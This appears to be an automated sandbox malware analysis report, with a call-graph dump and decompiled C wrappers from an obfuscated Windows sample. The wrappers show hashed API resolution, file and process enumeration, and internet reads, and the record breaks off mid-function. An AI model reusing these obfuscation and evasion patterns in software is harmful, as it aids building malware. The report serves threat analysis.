4986->4985 5093 4ef10f0 4987->5093 4989 4ee2a46 4990 4ed3035 GetPEB 4989->4990 4992 4ed2043 RtlFreeHeap GetPEB 4989->4992 4993 4ed2654 2 API calls 4989->4993 4994 4eed617 GetPEB 4989->4994 4995 4ee2e17 4989->4995 4996 4ee2e15 4989->4996 4997 4eef6d3 GetPEB 4989->4997 4998 4ee3fae GetPEB 4989->4998 5000 4eecaa8 2 API calls 4989->5000 5001 4ee0387 GetPEB 4989->5001 5003 4ef01ed GetPEB 4989->5003 5004 4ef0352 RtlFreeHeap GetPEB 4989->5004 5005 4ed3f5c RtlAllocateHeap GetPEB 4989->5005 5006 4edab99 GetPEB 4989->5006 5007 4ef25c3 3 API calls 4989->5007 5096 4edea72 4989->5096 5100 4ed7283 4989->5100 4990->4989 4992->4989 4993->4989 4994->4989 4999 4eea566 2 API calls 4995->4999 4996->4117 4997->4989 4998->4989 4999->4996 5000->4989 5001->4989 5003->4989 5004->4989 5005->4989 5006->4989 5007->4989 5009 4eddfe3 5008->5009 5025 4edfcc9 5009->5025 5013 4ee98d4 5012->5013 5014 4ee9b60 5013->5014 5029 4ed68df 5013->5029 5014->4909 5017 4ed1ed4 GetPEB 5018 4ee9b17 5017->5018 5018->5014 5019 4ed1ed4 GetPEB 5018->5019 5019->5018 5021 4ef069b 5020->5021 5022 4ef07ed 5021->5022 5023 4ee9d10 GetPEB 5021->5023 5033 4ee7e0b 5021->5033 5022->4909 5023->5021 5026 4edfce8 5025->5026 5027 4ed2309 GetPEB 5026->5027 5028 4ede09b 5027->5028 5028->4911 5030 4ed68fd 5029->5030 5031 4ed2309 GetPEB 5030->5031 5032 4ed6990 5031->5032 5032->5014 5032->5017 5034 4ee7e2a 5033->5034 5035 4ed2309 GetPEB 5034->5035 5036 4ee7ec4 5035->5036 5036->5021 5038 4ed2309 GetPEB 5037->5038 5039 4eee905 5038->5039 5039->4920 5041 4ef0204 5040->5041 5042 4ed419a GetPEB 5041->5042 5043 4ef029e 5042->5043 5043->4920 5048 4ef25dd 5044->5048 5046 4ef2850 5047 4eea566 2 API calls 5046->5047 5049 4ef284e 5047->5049 5048->5046 5048->5049 5050 4ee199d 2 API calls 5048->5050 5069 4eed551 5048->5069 5049->4920 5050->5048 5054 4eda06d 5051->5054 5052 4eee867 GetPEB 5052->5054 5054->5052 5055 4eda2da 5054->5055 5057 4eda2d8 5054->5057 5073 4ef0104 5054->5073 5077 4eefc5c 5054->5077 5058 4eea566 2 API calls 5055->5058 5057->4920 5058->5057 5060 4eddaed 5059->5060 5061 4eddeb0 5060->5061 5062 4ed5a31 GetPEB 5060->5062 5063 4edde94 5060->5063 5065 4ed3f5c 2 API calls 5060->5065 5068 4ef0352 2 API calls 5060->5068 5085 4eeff53 5060->5085 5089 4ed2f36 5060->5089 5061->4920 5061->5061 5062->5060 5081 4eecfb7 5063->5081 5065->5060 5068->5060 5070 4eed578 5069->5070 5071 4ed2309 GetPEB 5070->5071 5072 4eed601 5071->5072 5072->5048 5074 4ef012a 5073->5074 5075 4ed2309 GetPEB 5074->5075 5076 4ef01d3 5075->5076 5076->5054 5078 4eefc78 5077->5078 5079 4ed2309 GetPEB 5078->5079 5080 4eefd02 5079->5080 5080->5054 5082 4eecfcd 5081->5082 5083 4ed2309 GetPEB 5082->5083 5084 4eed085 5083->5084 5084->5061 5086 4eeff70 5085->5086 5087 4ed2309 GetPEB 5086->5087 5088 4ef001b 5087->5088 5088->5060 5090 4ed2f75 5089->5090 5091 4ed2309 GetPEB 5090->5091 5092 4ed3012 5091->5092 5092->5060 5094 4ed2309 GetPEB 5093->5094 5095 4ef118a 5094->5095 5095->4989 5097 4edeaa3 5096->5097 5098 4ed2309 GetPEB 5097->5098 5099 4edeb25 5098->5099 5099->4989 5105 4ed72a9 5100->5105 5101 4edf38a 2 API calls 5101->5105 5102 4ed755d 5102->4989 5103 4ed755f 5104 4eebb18 GetPEB 5103->5104 5104->5102 5105->5101 5105->5102 5105->5103 5107 4eecd19 5106->5107 5108 4ed2309 GetPEB 5107->5108 5109 4eecdda 5108->5109 5109->4129 5117 4ee90e0 5110->5117 5113 4ed2043 2 API calls 5113->5117 5114 4edf38a RtlAllocateHeap GetPEB 5114->5117 5115 4ef343c GetPEB 5115->5117 5116 4eea1d9 GetPEB 5116->5117 5117->5113 5117->5114 5117->5115 5117->5116 5118 4ee9891 5117->5118 5119 4ee98a4 5117->5119 5122 4ed419a GetPEB 5117->5122 5123 4ee9c25 5117->5123 5127 4ed887a 5117->5127 5131 4eede17 5117->5131 5120 4ed2043 2 API calls 5118->5120 5119->4129 5120->5119 5122->5117 5124 4ee9c5f 5123->5124 5125 4ed2309 GetPEB 5124->5125 5126 4ee9cf1 5125->5126 5126->5117 5128 4ed8896 5127->5128 5129 4ed2309 GetPEB 5128->5129 5130 4ed8923 5129->5130 5130->5117 5132 4eede42 5131->5132 5133 4ed2309 GetPEB 5132->5133 5134 4eededd 5133->5134 5134->5117 5136 4ee73dc 5135->5136 5137 4ed2309 GetPEB 5136->5137 5138 4ed4bd3 5137->5138 5138->3937 5140 4eee927 5139->5140 5141 4ed2309 GetPEB 5140->5141 5142 4eee9da 5141->5142 5142->4176 5144 4ed69c6 5143->5144 5145 4ed2309 GetPEB 5144->5145 5146 4ed6a62 5145->5146 5146->4176 5149 4ed52ae 5147->5149 5148 4ed3f5c 2 API calls 5148->5149 5149->5148 5151 4eeceb9 GetPEB 5149->5151 5152 4ed53d4 5149->5152 5154 4ed53d2 5149->5154 5155 4ef0352 2 API calls 5149->5155 5160 4ee0490 5149->5160 5151->5149 5153 4ee3d6e GetPEB 5152->5153 5153->5154 5154->4176 5155->5149 5157 4eeeb5c 5156->5157 5158 4ed2309 GetPEB 5157->5158 5159 4eeec0d 5158->5159 5159->4166 5161 4ee04a9 5160->5161 5162 4ed2309 GetPEB 5161->5162 5163 4ee055b 5162->5163 5163->5149 5203 4ed3c91 5204 4ee3fae GetPEB 5203->5204 5205 4ed3ed7 5204->5205 5206 4ee17cb 2 API calls 5205->5206 5207 4ed3eeb 5206->5207 5208 4ed3f5c 2 API calls 5207->5208 5215 4ed3f4e 5207->5215 5209 4ed3f06 5208->5209 5210 4edab99 GetPEB 5209->5210 5211 4ed3f27 5210->5211 5212 4ef0352 2 API calls 5211->5212 5213 4ed3f36 5212->5213 5214 4eef790 GetPEB 5213->5214 5214->5215 5164 4ee43b3 5165 4ee4473 5164->5165 5169 4ee449e 5164->5169 5170 4ed441e 5165->5170 5168 4ed4248 GetPEB 5168->5169 5179 4ed48e6 5170->5179 5171 4ed5a31 GetPEB 5171->5179 5172 4ef1988 GetPEB 5172->5179 5173 4ed4ac5 5175 4eecaa8 2 API calls 5173->5175 5174 4ed4ac3 5174->5168 5174->5169 5175->5174 5176 4ed3035 GetPEB 5176->5179 5177 4ed3f5c RtlAllocateHeap GetPEB 5177->5179 5178 4eed617 GetPEB 5178->5179 5179->5171 5179->5172 5179->5173 5179->5174 5179->5176 5179->5177 5179->5178 5180 4ee17cb 2 API calls 5179->5180 5181 4edab99 GetPEB 5179->5181 5182 4ef0352 RtlFreeHeap GetPEB 5179->5182 5180->5179 5181->5179 5182->5179 5216 4eefd10 5217 4eefe4b 5216->5217 5218 4eefe91 5217->5218 5219 4ed5923 2 API calls 5217->5219 5220 4eefe65 5219->5220 5224 4eebd84 5220->5224 5223 4ef0352 2 API calls 5223->5218 5225 4eebd9f 5224->5225 5226 4eebe97 5225->5226 5228 4ef2869 5225->5228 5226->5223 5229 4ef2882 5228->5229 5230 4ed2309 GetPEB 5229->5230 5231 4ef291c 5230->5231 5231->5225 5183 4ed5ab2 5197 4ed5ae1 5183->5197 5184 4ee3b54 GetPEB 5184->5197 5185 4ed2043 2 API calls 5185->5197 5186 4ef002c GetPEB 5186->5197 5187 4ed67a3 5191 4ed2153 GetPEB 5187->5191 5188 4ed3f5c RtlAllocateHeap GetPEB 5188->5197 5189 4ee3802 GetPEB 5189->5197 5190 4ed68da 5190->5190 5193 4ed67cb 5191->5193 5192 4ee18c8 GetPEB 5192->5197 5194 4ee54fd GetPEB 5194->5197 5195 4ee55bd GetPEB 5195->5197 5196 4edf38a 2 API calls 5196->5197 5197->5184 5197->5185 5197->5186 5197->5187 5197->5188 5197->5189 5197->5190 5197->5192 5197->5194 5197->5195 5197->5196 5198 4ef0352 RtlFreeHeap GetPEB 5197->5198 5198->5197

                                                                                                        Executed Functions

                                                                                                        Function 04EE1A80, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 67%
                                                                                                        			E04EE1A80(void* __ecx, struct _WIN32_FIND_DATAW* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t44;
				void* _t55;
				signed int _t57;
				struct _WIN32_FIND_DATAW* _t63;

				_push(_a16);
				_t63 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E04EF2523(_t44);
				_v36 = 0x40784c;
				asm("stosd");
				asm("stosd");
				_t57 = 0x66;
				asm("stosd");
				_v8 = 0xc58147;
				_v8 = _v8 / _t57;
				_v8 = _v8 >> 6;
				_v8 = _v8 + 0xffff0e61;
				_v8 = _v8 ^ 0xffff2899;
				_v16 = 0x3eee0f;
				_v16 = _v16 ^ 0xf4098113;
				_v16 = _v16 * 0x76;
				_v16 = _v16 ^ 0x918df00d;
				_v12 = 0x61adbd;
				_v12 = _v12 | 0x1ce5c3f2;
				_v12 = _v12 ^ 0x5ce6c57a;
				_v12 = _v12 ^ 0x400dc737;
				_v20 = 0x919b51;
				_v20 = _v20 + 0x9c69;
				_v20 = _v20 ^ 0x00927a19;
				E04ED2309(0x352, _t57, _t57, 0x810611c3, _t57, 0x9c9047d0);
				_t55 = FindFirstFileW(_a16, _t63); // executed
				return _t55;
			}













                                                                                                        0x04ee1a88
                                                                                                        0x04ee1a8b
                                                                                                        0x04ee1a8d
                                                                                                        0x04ee1a90
                                                                                                        0x04ee1a93
                                                                                                        0x04ee1a96
                                                                                                        0x04ee1a98
                                                                                                        0x04ee1a9d
                                                                                                        0x04ee1aac
                                                                                                        0x04ee1ab1
                                                                                                        0x04ee1ab2
                                                                                                        0x04ee1ab9
                                                                                                        0x04ee1aba
                                                                                                        0x04ee1acb
                                                                                                        0x04ee1ace
                                                                                                        0x04ee1ad2
                                                                                                        0x04ee1ad9
                                                                                                        0x04ee1ae0
                                                                                                        0x04ee1ae7
                                                                                                        0x04ee1af9
                                                                                                        0x04ee1afc
                                                                                                        0x04ee1b03
                                                                                                        0x04ee1b0a
                                                                                                        0x04ee1b11
                                                                                                        0x04ee1b18
                                                                                                        0x04ee1b1f
                                                                                                        0x04ee1b26
                                                                                                        0x04ee1b2d
                                                                                                        0x04ee1b40
                                                                                                        0x04ee1b4c
                                                                                                        0x04ee1b53

                                                                                                        APIs
                                                                                                        • FindFirstFileW.KERNEL32(04EDCC4B,?,?,?,?,?,?,?,?,?,?,09AB8BF6,00000072), ref: 04EE1B4C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileFindFirst
                                                                                                        • String ID: Lx@
                                                                                                        • API String ID: 1974802433-402333656
                                                                                                        • Opcode ID: 36fdb602463615d85640dee2202416375b56d64be84a9f72e6469216861f4ee0
                                                                                                        • Instruction ID: c93e56aed74b6fa4aaecc6c3fab19bc3639218cf63abdd801755cd69e0f58b05
                                                                                                        • Opcode Fuzzy Hash: 36fdb602463615d85640dee2202416375b56d64be84a9f72e6469216861f4ee0
                                                                                                        • Instruction Fuzzy Hash: 14214375D00209EBEB18CFA9DC4A8DEBFB4FB84304F008188E911A6260D3B59B54DFA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 04EF1027, Relevance: 1.6, APIs: 1, Instructions: 57filenetworkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 69%
                                                                                                        			E04EF1027(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, long _a12, intOrPtr _a16, intOrPtr _a20, DWORD* _a24) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t46;
				int _t55;
				signed int _t57;
				void* _t62;

				_push(_a24);
				_t62 = __ecx;
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E04EF2523(_t46);
				_v12 = 0xd4e775;
				_v12 = _v12 ^ 0x9fa1d679;
				_v12 = _v12 + 0xffffd43b;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 ^ 0x000b9d33;
				_v20 = 0xb1fd06;
				_v20 = _v20 + 0xffff1766;
				_v20 = _v20 ^ 0x00bd550d;
				_v16 = 0x2d7499;
				_v16 = _v16 << 0x10;
				_v16 = _v16 ^ 0x749af706;
				_v8 = 0x5dfa4b;
				_t57 = 0x11;
				_v8 = _v8 / _t57;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 | 0xef9b7d02;
				_v8 = _v8 ^ 0xef9457ed;
				E04ED2309(0x254, _t57, _t57, 0xf677e454, _t57, 0xc0cf1a4);
				_t55 = InternetReadFile(_t62, _a8, _a12, _a24); // executed
				return _t55;
			}











                                                                                                        0x04ef102e
                                                                                                        0x04ef1031
                                                                                                        0x04ef1033
                                                                                                        0x04ef1036
                                                                                                        0x04ef1039
                                                                                                        0x04ef103c
                                                                                                        0x04ef103f
                                                                                                        0x04ef1043
                                                                                                        0x04ef1044
                                                                                                        0x04ef1049
                                                                                                        0x04ef1053
                                                                                                        0x04ef105c
                                                                                                        0x04ef1063
                                                                                                        0x04ef1067
                                                                                                        0x04ef106e
                                                                                                        0x04ef1075
                                                                                                        0x04ef107c
                                                                                                        0x04ef1083
                                                                                                        0x04ef108a
                                                                                                        0x04ef108e
                                                                                                        0x04ef1095
                                                                                                        0x04ef10a1
                                                                                                        0x04ef10a9
                                                                                                        0x04ef10ac
                                                                                                        0x04ef10b0
                                                                                                        0x04ef10b7
                                                                                                        0x04ef10d7
                                                                                                        0x04ef10e9
                                                                                                        0x04ef10ef

                                                                                                        APIs
                                                                                                        • InternetReadFile.WININET(?,749AF706,00BD550D,?), ref: 04EF10E9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FileInternetRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 778332206-0
                                                                                                        • Opcode ID: 2d4f4d84a63d0f13ac273aada7b35ede13ebed0102486743890e3910fc006acb
                                                                                                        • Instruction ID: a5dc448cfcb4e56c00d917782c4e01c826b36200d5a3918a22c8cbb2fa0879d8
                                                                                                        • Opcode Fuzzy Hash: 2d4f4d84a63d0f13ac273aada7b35ede13ebed0102486743890e3910fc006acb
                                                                                                        • Instruction Fuzzy Hash: 5D2113B6D00209BBDF06DFE4C94A8EEBBB1EF44304F108189F92566251E3B55B61EB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 04EE1B54, Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E04EE1B54(int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t51;
				signed int _t52;

				_v24 = _v24 & 0x00000000;
				_v36 = 0x604094;
				_v32 = 0x94e455;
				_v28 = 0xad6ab3;
				_v8 = 0x1f2344;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 << 0xe;
				_t52 = 0x3c;
				_v8 = _v8 * 0x16;
				_v8 = _v8 ^ 0x0ab2d5aa;
				_v20 = 0xb8d8f1;
				_v20 = _v20 ^ 0x9bb5e2ea;
				_v20 = _v20 ^ 0x9b0a37ea;
				_v16 = 0x527695;
				_v16 = _v16 << 1;
				_v16 = _v16 / _t52;
				_v16 = _v16 ^ 0x000d80fe;
				_v12 = 0xedaf67;
				_v12 = _v12 ^ 0xb485e6d8;
				_v12 = _v12 + 0xffff9be0;
				_v12 = _v12 ^ 0xb46ea43d;
				E04ED2309(0x190, _t52, _t52, 0xbde7009f, _t52, 0x9c9047d0);
				_t51 = CreateToolhelp32Snapshot(_a4, 0); // executed
				return _t51;
			}













                                                                                                        0x04ee1b5a
                                                                                                        0x04ee1b60
                                                                                                        0x04ee1b67
                                                                                                        0x04ee1b6e
                                                                                                        0x04ee1b75
                                                                                                        0x04ee1b7c
                                                                                                        0x04ee1b80
                                                                                                        0x04ee1b8a
                                                                                                        0x04ee1b91
                                                                                                        0x04ee1b94
                                                                                                        0x04ee1b9b
                                                                                                        0x04ee1ba2
                                                                                                        0x04ee1ba9
                                                                                                        0x04ee1bb0
                                                                                                        0x04ee1bb7
                                                                                                        0x04ee1bc4
                                                                                                        0x04ee1bc7
                                                                                                        0x04ee1bce
                                                                                                        0x04ee1bd5
                                                                                                        0x04ee1bdc
                                                                                                        0x04ee1be3
                                                                                                        0x04ee1bfd
                                                                                                        0x04ee1c0a
                                                                                                        0x04ee1c0f

                                                                                                        APIs
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(B46EA43D,00000000), ref: 04EE1C0A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateSnapshotToolhelp32
                                                                                                        • String ID:
                                                                                                        • API String ID: 3332741929-0
                                                                                                        • Opcode ID: 8dbd4dee2a96a2a279b30488413906bed3e520bcc45b322a8894c97035d3b5c6
                                                                                                        • Instruction ID: 7aef1b73c233a7ecbcead2076d00ee6a66e917f7f878314bd170cc5f9443df23
                                                                                                        • Opcode Fuzzy Hash: 8dbd4dee2a96a2a279b30488413906bed3e520bcc45b322a8894c97035d3b5c6
                                                                                                        • Instruction Fuzzy Hash: 7811F3B1D0520CEBDB18DFA8C94A5AEBBB0FF44304F108199E521B72A0D7B56B04DF51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 04ED54DA, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 57networkCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 561 4ed54da-4ed55ae call 4ef2523 call 4ed2309 InternetCloseHandle
                                                                                                        C-Code - Quality: 87%
                                                                                                        			E04ED54DA(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t52;
				int _t63;
				signed int _t65;
				signed int _t66;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E04EF2523(_t52);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x6eade3;
				_v20 = 0x70ee4c;
				_v20 = _v20 + 0xffffd19f;
				_v20 = _v20 ^ 0x007528c6;
				_v16 = 0x80bb49;
				_v16 = _v16 + 0xffff2cb2;
				_v16 = _v16 >> 4;
				_t65 = 0x3d;
				_v16 = _v16 / _t65;
				_v16 = _v16 ^ 0x000cd3d3;
				_v12 = 0x49bca9;
				_v12 = _v12 + 0x284b;
				_v12 = _v12 + 0x352d;
				_v12 = _v12 ^ 0x5aa1db04;
				_v12 = _v12 ^ 0x5aee1bd2;
				_v8 = 0xbb5f19;
				_v8 = _v8 << 9;
				_v8 = _v8 | 0x616a7bee;
				_t39 =  &_v8; // 0x616a7bee
				_t66 = 0x5f;
				_v8 =  *_t39 / _t66;
				_v8 = _v8 ^ 0x01468cd5;
				E04ED2309(_t66 + 0x22, _t66, _t66, 0x1d483158, _t66, 0xc0cf1a4);
				_t63 = InternetCloseHandle(_a12); // executed
				return _t63;
			}













                                                                                                        0x04ed54e0
                                                                                                        0x04ed54e3
                                                                                                        0x04ed54e6
                                                                                                        0x04ed54eb
                                                                                                        0x04ed54f0
                                                                                                        0x04ed54f7
                                                                                                        0x04ed5500
                                                                                                        0x04ed5507
                                                                                                        0x04ed550e
                                                                                                        0x04ed5515
                                                                                                        0x04ed551c
                                                                                                        0x04ed5523
                                                                                                        0x04ed552c
                                                                                                        0x04ed5531
                                                                                                        0x04ed5536
                                                                                                        0x04ed553d
                                                                                                        0x04ed5544
                                                                                                        0x04ed554b
                                                                                                        0x04ed5552
                                                                                                        0x04ed5559
                                                                                                        0x04ed5560
                                                                                                        0x04ed5567
                                                                                                        0x04ed556b
                                                                                                        0x04ed5572
                                                                                                        0x04ed5575
                                                                                                        0x04ed557d
                                                                                                        0x04ed5580
                                                                                                        0x04ed559e
                                                                                                        0x04ed55a9
                                                                                                        0x04ed55ae

                                                                                                        APIs
                                                                                                        • InternetCloseHandle.WININET(007528C6), ref: 04ED55A9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandleInternet
                                                                                                        • String ID: -5$Lp${ja
                                                                                                        • API String ID: 1081599783-1222928185
                                                                                                        • Opcode ID: 96c25ca98efac3a213f8ce2c5c378593396d62ac674d19cb573e17f5676fb90f
                                                                                                        • Instruction ID: 3e64b870e5b6b5d2149e4e43436efd803f39b424004a704553f184bb96059c54
                                                                                                        • Opcode Fuzzy Hash: 96c25ca98efac3a213f8ce2c5c378593396d62ac674d19cb573e17f5676fb90f
                                                                                                        • Instruction Fuzzy Hash: 342104B6D0120DEBEF04DFE5C94A9AEBBB1FB10318F108199E520A6250E3B95B14CF91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 04EEF606, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 566 4eef606-4eef6d2 call 4ef2523 call 4ed2309 Process32FirstW
                                                                                                        C-Code - Quality: 82%
                                                                                                        			E04EEF606(void* __ecx, void* __edx, struct tagPROCESSENTRY32W* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t43;
				void* _t50;
				void* _t54;

				_push(_a8);
				_t54 = __edx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E04EF2523(_t43);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v32 = 0xf33a94;
				_v8 = 0x16e1c5;
				_v8 = _v8 << 0x10;
				_v8 = _v8 + 0xffff7501;
				_v8 = _v8 * 0x3d;
				_v8 = _v8 ^ 0xcbc2f299;
				_v20 = 0x18380a;
				_v20 = _v20 + 0x556a;
				_v20 = _v20 ^ 0x2e444359;
				_v20 = _v20 ^ 0x2e5734c8;
				_v16 = 0x1de0f;
				_v16 = _v16 + 0xffff3d0f;
				_v16 = _v16 ^ 0x5b4c4104;
				_v16 = _v16 ^ 0x5b45396c;
				_v12 = 0x8d2c67;
				_v12 = _v12 | 0x6bb36e73;
				_v12 = _v12 ^ 0x44de99d4;
				_v12 = _v12 ^ 0x2f6e43e4;
				_t50 = E04ED2309(0x343, __ecx, __ecx, 0x1a63a552, __ecx, 0x9c9047d0);
				Process32FirstW(_t54, _a4); // executed
				return _t50;
			}













                                                                                                        0x04eef60d
                                                                                                        0x04eef610
                                                                                                        0x04eef612
                                                                                                        0x04eef615
                                                                                                        0x04eef616
                                                                                                        0x04eef617
                                                                                                        0x04eef61c
                                                                                                        0x04eef623
                                                                                                        0x04eef627
                                                                                                        0x04eef62e
                                                                                                        0x04eef635
                                                                                                        0x04eef639
                                                                                                        0x04eef650
                                                                                                        0x04eef653
                                                                                                        0x04eef65a
                                                                                                        0x04eef661
                                                                                                        0x04eef668
                                                                                                        0x04eef66f
                                                                                                        0x04eef676
                                                                                                        0x04eef67d
                                                                                                        0x04eef684
                                                                                                        0x04eef68b
                                                                                                        0x04eef692
                                                                                                        0x04eef699
                                                                                                        0x04eef6a0
                                                                                                        0x04eef6a7
                                                                                                        0x04eef6c0
                                                                                                        0x04eef6cc
                                                                                                        0x04eef6d2

                                                                                                        APIs
                                                                                                        • Process32FirstW.KERNEL32(00000000,2F6E43E4,?,?,?,?,?,?,?,?,00000000), ref: 04EEF6CC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.1232050333.0000000004ED1000.00000020.00000001.sdmp, Offset: 04ED0000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.1232044390.0000000004ED0000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232069361.0000000004EF5000.00000004.00000001.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.1232075435.0000000004EF7000.00000002.00000001.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_7_2_4ed0000_rundll32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: FirstProcess32
                                                                                                        • String ID: YCD.$l9E[$Cn/
                                                                                                        • API String ID: 2623510744-4191728293
                                                                                                        • Opcode ID: ba6908419aca7e40de5752100cf2159fdf1c013576c21fa5a45c6b552e88f8aa
                                                                                                        • Instruction ID: 5105093ff7696a187f2d750dd7c855609ba2d18b720298e1cbb5bafcacac4bc1
                                                                                                        • Opcode Fuzzy Hash: ba6908419aca7e40de5752100cf2159fdf1c013576c21fa5a45c6b552e88f8aa
                                                                                                        • Instruction Fuzzy Hash: 422153B6C01209EBCF08DFE4D9499AEBBB4FF10715F108289E515B6210D3741B00DF91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 04EEA809, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 55%
                                                                                                        			E04EEA809(DWORD* __ecx, void* __edx, intOrPtr _a12, WCHAR* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t45;
				int _t55;
				DWORD* _t60;

				_t60 = __ecx;
				_push(0);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(0);
				_push(0);
				_push(__ecx);
				E04EF2523(_t45);
				_v36 = 0x72e62c;
				_v32 = 0x6afee3;
				_v28 = 0;
				_v24 = 0;
				_v12 = 0x241442;
				_v12 = _v12 ^ 0x5f0a7563;
				_v12 = _v12 * 0x4b;
				_v12 = _v12 + 0xffff00d5;
				_v12 = _v12 ^ 0xe298fffa;
				_v20 = 0x629ccf;
				_v20 = _v20 + 0xa262;
				_v20 = _v20 ^ 0x006504c5;
				_v8 = 0x8dfd52;
				_v8 = _v8 * 0x5f;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 << 0xd;
				_v8 = _v8 ^ 0x1a5bea6c;
				_v16 = 0x13a484;
				_v16 = _v16 * 0x42;
				_v16 = _v16 ^ 0x051e7b21;
